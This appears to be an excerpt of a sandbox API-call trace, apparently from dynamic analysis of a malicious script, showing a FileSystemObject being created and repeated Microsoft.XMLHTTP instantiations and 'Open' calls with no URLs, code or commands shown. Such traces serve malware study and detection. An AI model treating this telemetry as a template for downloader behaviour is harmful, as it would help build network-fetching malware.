	[0446.933] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0446.936] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0446.936] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0446.936] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0446.936] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0446.936] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0446.936] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0447.790] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0447.790] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0447.790] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0447.791] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0447.791] SysStringLen (param_1=0x0) returned 0x0
	[0447.791] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0447.791] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0447.791] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0447.791] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0447.791] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0447.791] ??2@YAPEAX_K@Z () returned 0x62f310
	[0447.792] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0447.792] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0447.792] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0447.792] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0447.792] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0447.792] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0447.792] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0447.794] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0447.794] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0447.794] SysStringLen (param_1=0x0) returned 0x0
	[0447.794] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0447.794] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0447.794] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0447.794] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0447.794] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0447.794] ??2@YAPEAX_K@Z () returned 0x62f330
	[0447.794] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0447.794] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0447.794] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0447.795] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0447.795] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0447.795] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0447.795] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0447.795] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0447.795] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0447.795] SysStringLen (param_1=0x0) returned 0x0
	[0447.795] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0447.795] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0447.795] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7530) returned 0x0
	[0447.795] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0447.795] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0447.795] ??2@YAPEAX_K@Z () returned 0x62f310
	[0447.795] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0447.795] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0447.795] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0447.795] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7530) returned 0x0
	[0447.795] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7530) returned 0x3
	[0447.795] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0447.796] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7530, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0447.796] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0447.796] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0447.796] SysStringLen (param_1=0x0) returned 0x0
	[0447.796] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0447.796] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0447.796] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0447.796] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0447.796] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7498) returned 0x0
	[0447.796] ??2@YAPEAX_K@Z () returned 0x62f330
	[0447.796] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7498, pUnkSite=0x62f330) 
	[0447.796] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0447.796] XMLHTTPRequest:IUnknown:Release (This=0x49c7498) returned 0x0
	[0447.796] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0447.796] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0447.796] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0447.796] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0447.796] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0447.797] longjmp () 
	[0447.797] longjmp () 
	[0447.797] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0447.797] SysStringLen (param_1=0x0) returned 0x0
	[0447.797] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0447.797] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0447.797] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0447.797] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0447.797] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0447.797] ??2@YAPEAX_K@Z () returned 0x62f310
	[0447.797] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0447.797] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0447.797] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0447.797] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0447.797] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0447.797] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0447.797] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0447.797] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0447.798] longjmp () 
	[0447.798] longjmp () 
	[0447.798] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0447.798] SysStringLen (param_1=0x0) returned 0x0
	[0447.798] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0447.798] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0447.798] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0447.798] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0447.798] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c68) returned 0x0
	[0447.798] ??2@YAPEAX_K@Z () returned 0x62f330
